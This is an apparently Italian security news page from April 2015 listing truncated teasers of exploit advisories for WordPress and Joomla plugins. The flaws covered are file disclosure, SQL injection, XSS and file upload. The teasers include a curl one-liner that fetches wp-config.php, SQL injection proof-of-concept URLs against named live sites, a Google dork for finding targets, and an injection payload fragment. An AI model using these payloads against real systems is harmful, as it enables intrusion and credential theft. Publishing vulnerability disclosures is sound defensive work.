WordPress Fusion Engage Local File Disclosure

16 aprile 2015 - Fonte: http://www.mondounix.com
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has a LFD. Here's the relevant code..
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
    }add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...

Leggi il seguito »

WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

16 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
 
 
 Location file: /view/actions.php
 
 This is the bugged ajax functions wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
...

Leggi il seguito »

WordPress Windows Desktop And iPhone Photo Uploader File Upload

16 aprile 2015 - Fonte: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
 
////////////////////////
///...

Leggi il seguito »

WordPress Shareaholic 7.6.0.3 Cross Site Scripting

8 aprile 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
  $location = $_POST['location'];
  $app_name = $location['app_name'];
  ShareaholicUtilities::update_options(array(
...

Leggi il seguito »

Joomla Contact Form Maker 1.0.1 SQL Injection

3 aprile 2015 - Fonte: http://www.mondounix.com
[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability.
 
[+]Proof Of Concept:
 
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
 
 
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'

(9)

...

Leggi il seguito »

Joomla Gallery WD SQL Injection

3 aprile 2015 - Fonte: http://www.mondounix.com
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
 
parameter 'theme_id' in GET vulnerable
 
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT...

Leggi il seguito »

WordPress Revolution Slider File Upload

3 aprile 2015 - Fonte: http://www.mondounix.com
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
 
 
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303....

Leggi il seguito »

WordPress Simple Ads Manager SQL Injection

3 aprile 2015 - Fonte: http://www.mondounix.com
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le () itas vn) & ITAS Team
 
 
::PROOF OF CONCEPT::
 
---SQL INJECTION 1---
 
+ REQUEST:
 
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;...

Leggi il seguito »

WordPress videowhisper-video-conference-integration v4.91.8 Remote file upload v4.91.8

3 aprile 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won’t fix. http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web based multiple way video chat and real time file sharing tool.  Read more on WordPress Video Conference plugin home page."
 
Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php...

Leggi il seguito »

WordPress videowhisper-video-presentation v3.31.17 Remote file upload

3 aprile 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site "VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam...

Leggi il seguito »